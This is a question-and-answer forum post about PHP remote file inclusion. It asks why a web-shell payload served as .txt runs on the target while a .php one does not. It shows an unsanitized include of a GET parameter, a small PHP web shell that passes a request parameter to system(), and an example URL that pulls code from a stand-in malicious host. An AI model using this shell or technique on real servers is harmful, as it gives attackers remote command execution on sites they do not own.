# Why php RFI works with .txt but non with .php?

Tags: php

**BACKEND:**

```
<?php $file = $_GET["file"];
      include $file; ?>
```

**bad.txt bad.php CONTENT:**

```
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>
```

**1ST ATTEMPT:**

```
http://<IP>/bad.php?cmd=ipconfig
```

**2ND ATTEMPT:**

```
http://<IP>/bad.txt?cmd=ipconfig
```

Why the 2nd attempt works and the 1st don't?

Comment: What response do you get with the first one?

Comment: This is not answerable with the info you have provided because this is an issue with server configuration, not PHP or code. As a general rule of thumb, PHP in a txt file would never be executed, so a non-standard configuration is in use here. You need to look at how the server is configured.

Comment: The PHP interpreter doesn't care about file extensions. In fact it doesn't even need files, you can pass code as command-line argument. Whether a given file is passed to PHP depends entirely on web server settings.

Comment: This is lacking the explanation, where the `file` parameter that you evaluate in BACKEND, is actually set. Presumable there is URL rewriting involved, but you failed to give us the relevant details.

Answer (score 0):

I'm making an assumption or two based on the info you gave, but this is usually the issue -- when you request a file from the server with a `.php` extension, the script is run on *the hosting server you are requesting the include from*. Therefore, what is included is the *output* of the PHP script on the hosting server rather than the *contents*. With a `.txt` extension, however, the hosting server treats it as text and simply serves the raw PHP code. This code is included in the vulnerable PHP page and the malicious code is run on the affected site.

In other words, if you request `https://vulnsite.com/rfi.php?file=https://malicioussite.com/evil.php`, then `evil.php` will be run *on `malicioussite.com`* and the output is returned and included with the `rfi.php` page on `vulnsite.com`. If you use `evil.txt` instead, then the raw PHP code is sent to the vulnerable site, included in the script, and executed as you're intending.